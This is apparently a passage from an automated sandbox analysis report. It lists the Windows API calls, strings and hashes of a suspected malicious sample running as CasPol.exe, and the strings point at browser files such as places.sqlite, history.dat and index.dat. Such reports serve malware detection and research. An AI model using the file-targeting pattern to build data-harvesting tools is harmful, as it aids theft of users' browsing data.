                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                • String ID: history.dat$places.sqlite
                                                                                                • API String ID: 2641622041-467022611
                                                                                                • Opcode ID: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                • Opcode Fuzzy Hash: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                APIs
                                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                                • String ID:
                                                                                                • API String ID: 839530781-0
                                                                                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFindFirst
                                                                                                • String ID: *.*$index.dat
                                                                                                • API String ID: 1974802433-2863569691
                                                                                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                APIs
                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$FilePointer
                                                                                                • String ID:
                                                                                                • API String ID: 1156039329-0
                                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                • String ID:
                                                                                                • API String ID: 3397143404-0
                                                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                APIs
                                                                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                • String ID:
                                                                                                • API String ID: 1125800050-0
                                                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandleSleep
                                                                                                • String ID: }A
                                                                                                • API String ID: 252777609-2138825249
                                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                APIs
                                                                                                • malloc.MSVCRT ref: 00409A10
                                                                                                • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                • free.MSVCRT ref: 00409A31
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: freemallocmemcpy
                                                                                                • String ID:
                                                                                                • API String ID: 3056473165-0
                                                                                                • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: d
                                                                                                • API String ID: 0-2564639436
                                                                                                • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset
                                                                                                • String ID: BINARY
                                                                                                • API String ID: 2221118986-907554435
                                                                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcsicmp
                                                                                                • String ID: /stext
                                                                                                • API String ID: 2081463915-3817206916
                                                                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                APIs
                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                • String ID:
                                                                                                • API String ID: 2445788494-0
                                                                                                • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                APIs
                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 3150196962-0
                                                                                                • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                APIs
                                                                                                Strings
                                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: malloc
                                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                                • API String ID: 2803490479-1168259600
                                                                                                • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 0041BDDF
                                                                                                • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmpmemset
                                                                                                • String ID:
                                                                                                • API String ID: 1065087418-0
                                                                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                APIs
                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1381354015-0
                                                                                                • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset
                                                                                                • String ID:
                                                                                                • API String ID: 2221118986-0
                                                                                                • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                APIs
                                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                • String ID:
                                                                                                • API String ID: 2154303073-0
                                                                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                APIs
                                                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 3150196962-0
                                                                                                • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                APIs
                                                                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$PointerRead
                                                                                                • String ID:
                                                                                                • API String ID: 3154509469-0
                                                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                APIs
                                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                • String ID:
                                                                                                • API String ID: 4232544981-0
                                                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                APIs
                                                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID:
                                                                                                • API String ID: 3664257935-0
                                                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                APIs
                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                • String ID:
                                                                                                • API String ID: 3859505661-0
